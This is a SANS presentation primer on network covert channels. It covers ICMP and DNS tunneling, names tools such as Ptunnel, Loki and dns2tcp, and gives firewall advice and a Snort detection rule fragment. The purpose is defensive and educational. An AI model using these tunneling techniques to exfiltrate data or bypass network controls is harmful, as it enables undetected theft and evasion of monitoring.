Covert Channels A Primer for Security Professionals Erik Couture GIAC GSEC GCIH GCIA March 2011 SANS Technology Institute - Candidate for Master of Science Degree 1 Definition and Origin • 3 types of info hiding – Cryptography - Make message unreadable – Stegonography - Hide the message in another message – Metaferography - Hide the message in the carrier • Easy to design, hard to detect SANS Technology Institute - Candidate for Master of Science Degree 2 Covert Channels • Clever misuse of network protocols • Nearly undetectable • Not all that common “They’ll never see me coming!” SANS Technology Institute - Candidate for Master of Science Degree 3 How it is done • Modulate either: – the channel’s characteristics – the content • Do it without: – breaking protocol standards – making it look anomalous SANS Technology Institute - Candidate for Master of Science Degree 4 ICMP • ‘Unspecified’ amount of data can be attached • Sometime blocked inbounds, rarely outbound • Ptunnel, Loki, 007Shell, Hans, more… What a PING looks like. What a “PING” can look like.. SANS Technology Institute - Candidate for Master of Science Degree 5 DNS • Generally allowed through network protective devices • http://Dsf6tas6df5f5d7f5adsf8a6d56a5d7.domain.com • OzymanDSN, MSTX, dns2tcp SANS Technology Institute - Candidate for Master of Science Degree 6 Future Threats • IPv6 – v00d00N3t - fully featured ICMPv6 covert channel • Application Layer – VoIP, mail, file transfer • Layer 2 – 802.11, ARP • Using CCs to break out of software sandboxes SANS Technology Institute - Candidate for Master of Science Degree 7 CC Design Considerations • Ease of detection • Ease of implementation • Carrier availability • Bandwidth • Reliability SANS Technology Institute - Candidate for Master of Science Degree 8 Defensive practices • Firewall – Block outgoing ICMP – Block DNS queries other then from internal proxy • Snort rules – Spotting known signatures • alert udp any any -> any 53 (content:"|00 00 29 10 00 00 00 80 00 00 00|"..... – Exploit specific, as these things are • Anomaly Detection – Spot unusual spikes in of DNS traffic on port 53 – Frequent, oversized DNS TXT records – Any anomalous behavior (How hard is that?!) SANS Technology Institute - Candidate for Master of Science Degree 9 Defensive R&D • Statistical Analysis – Proven to work in theory • Active Wardens – Full scan and rewrite of traffic – Resource intensive SANS Technology Institute - Candidate for Master of Science Degree 10 The Threat • Cyber Criminals - (financial data) • Cyber-warriors - (political/military) • Corporate espionage - (IP theft) • Hacktivists - (idealism) • Individual Hackers - (fame/thrill) • Spammers - (ad distribution) SANS Technology Institute - Candidate for Master of Science Degree 11 Hypothetical ‘Smart’ Covert Channel • STUXNET- like scenario – High value target – Motivated and resourced attacker • Built in recon ability • Protocol flexibility • Low and slow • Virtually Undetectable SANS Technology Institute - Candidate for Master of Science Degree 12 Why not more common? • Benefits vs limitations • ‘Signal to Noise Ratio’ High Covertness Low Low Throughput High SANS Technology Institute - Candidate for Master of Science Degree 13 For Good not Evil? • Can allow oppressed people to get through Government firewalls/filters • Back to the volume dilemma SANS Technology Institute - Candidate for Master of Science Degree 14 Summary • Covert Channels are: – the death of perimeter security? – not inconceivable, but not a high priority for most • Whatever to do? – Focus on the fundamentals and “low hanging…” – Perform and execute defense in depth, in line with your Threat/Risk Assessment and SANS ‘20 Critical Security Controls’ References and more? Please see my paper is in the SANS Reading room: www.sans.org/reading_room/whitepapers/detection/covert-channels_33413 SANS Technology Institute - Candidate for Master of Science Degree 15